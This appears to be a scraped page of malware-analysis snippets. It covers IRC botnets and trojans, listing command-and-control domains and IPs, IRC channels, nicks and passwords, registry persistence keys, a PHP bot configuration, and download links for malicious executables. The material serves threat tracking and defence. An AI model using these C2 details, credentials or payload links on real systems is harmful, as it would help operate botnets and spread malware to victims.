Resolved : [us2.holdbaby.com] To [174.121.110.122] Remote Host Port Number 174.121.110.122 8800 208.82.236.129 80 208.82.238.129 80 67.212.77.13 80 Registry Modifications * The newly created Registry Values are: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon] + Taskman = “C:RECYCLERS-1-5-21-0243556031-888888379-781863308-1191wdfewi.exe” so that wdfewi.exe runs every time Windows starts o [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun] + Bfwe = “C:RECYCLERS-1-5-21-0243556031-888888379-781863308-1191wdfewi.exe” so that wdfewi.exe runs every time Windows startsRead more...

a.bestplay2010.com DNS_TYPE_A IP’s 109.196.142.66 109.196.142.58 port:5901 109.196.142.66:5901 PASS eee Data sent: 4b43 494b 2063 796d 7271 666a 6f0d 0a72 KCIK cymrqfjo..r 7373 7220 6d67 7670 6f79 6f79 2022 2220 ssr mgvpoyoy “” 2265 736d 2220 3a6d 6776 706f 796f 790d “esm” :mgvpoyoy. 0a . Data received: 3a49 5243 2149 5243 4068 7562 2e75 732e :IRC!IRC@hub.us.Read more...

– DNS Queries:p34s3.hmarhelo.com Resolved : [p34s3.hmarhelo.com] To [209.90.137.221] Resolved : [p34s3.hmarhelo.com] To [209.90.137.222] Resolved : [p34s3.hmarhelo.com] To [209.90.137.224] Resolved : [p34s3.hmarhelo.com] To [209.90.137.223] port:1199 Anubis scan: http://anubis.iseclab.org/?action=result&task_id=16e217e8f63db0d846dcdfb341c870529&format=html infos about hosting: http://whois.domaintools.com/209.90.137.223

Remote Host Port Number 87.98.179.1 25 87.98.179.1 6667 NICK [UserName|821|United-States] NICK username1 PONG :4CA947ED PRIVMSG #barbiesrule :kh12795@gmail.com USER Win32-Liquid Victim #821 * :http://liquid-security.net JOIN #barbiesrule 3l173 PRIVMSG #barbiesrule :[Screenshot] Screen capture sent to kh12795@gmail.com. PRIVMSG #barbiesrule :[Login] I’m already owned by Shockwave! NICK [UserName|7114|United-States] PRIVMSG #barbiesrule :[Login] I’m at your service, Shockwave. Now talking inRead more...

Remote Host Port Number 216.178.38.224 80 63.135.80.46 80 64.208.241.41 80 66.220.149.11 80 64.27.1.118 1866 PASS xxx NICK NEW-[USA|00|P|81244] USER XP-1086 * 0 :COMPUTERNAME MODE NEW-[USA|00|P|81244] -ix JOIN #!high! test PONG 22 MOTD infos about hosting: http://whois.domaintools.com/64.27.1.118

56youku.3322.org DNS_TYPE_A 183.7.66.173 – TCP Connection Attempts:183.7.66.173:8000 Suspicious Actions Detected Copies self to other locations Creates and executes scripts Creates files in windows system directory Creates system services or drivers exe file : http://ct.ftpvpn.info:3355/yuhaimin/windsca.exe anubis scan: http://anubis.iseclab.org/?action=result&task_id=1ef1923bf055827246da05311ccd4a263&format=html info about hosting: http://whois.domaintools.com/183.7.66.173

Resolved : [bad-girl.no-ip.biz] To [91.97.55.200] Remote Host Port Number 91.97.55.200 58281 Registry Modifications The following Registry Key was created: HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{E3FB2449-64ED-226C-A731-D39F73A3069B} The newly created Registry Values are: [HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{E3FB2449-64ED-226C-A731-D39F73A3069B}] StubPath = “%System%svhost32.exe” so that svhost32.exe runs every time Windows starts [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] Windows Host Prozess = “%System%svhost32.exe” so that svhost32.exe runs every time WindowsRead more...

var $config = array(“server”=>”50.22.148.142”, “port”=>1345, “pass”=>””, “prefix”=>”ClickDown”, “maxrand”=>4, “chan”=>”#dada”, “key”=>””, “modes”=>”+s”, “password”=>”click”, “trigger”=>”.”, “hostauth”=>”*” // * for any hostname Invisible Users: 31 Channels: 1 channels formed Clients: I have 32 clients and 0 servers Local users: Current Local Users: 32 Max: 779 Global users: Current Global Users: 32 Max: 288 download link here: http://50.22.148.142/pepinas.txt? moreRead more...

DNS QueriesDNS Query Text blenderartists.org IN A + zonetf.com IN A + zonedg.com IN A + freeonlinedatingtips.net: type A, class IN, addr 69.42.208.146 bigspiderwomen.com: type A, class IN, addr 64.191.90.101 sharewareconnection.com: type A, class IN, addr 216.240.159.81 HTTP QueriesHTTP Query Text zonetf.com POST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSvfuFuTLiv0agDgGxMl%2FvDr3WCGkrg%2B8OtBfBvOZTuxq00sD0OpLjRqAOpPRO%2FUq%2F3vleWbkY%3D HTTP/1.1 blenderartists.org GET /external/Banners/facebook2.jpg?tq=gHZutDyMv5rJcyG1J8K%2B1MWCJbP4lltXIA%3D%3D HTTP/1.0 zonedg.com GET /images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvcj0ujbwvgS917W65rJqlLfgPiWW1cg HTTP/1.0 Threads CreatedPIdRead more...

Remote Host Port Number 124.217.248.138 20 PASS google_cache2.tmp NICK n{Ganja-USA|XP}752152 USER 5074 “” “TsGh” :5074 JOIN #panama PONG :irc.sdfadsf.com another dbs same ip: – DNS Queries: Name Query Type Query Result Successful Protocol security10.sytes.net DNS_TYPE_A 124.217.248.138 YES udp – IRC Conversations: From ANUBIS:1039 to 124.217.248.138:20 Nick: n{Ganja-AUT|XP}731969 Username: 0359 Server Pass: google_cache2.tmp Joined Channel: #mexicoRead more...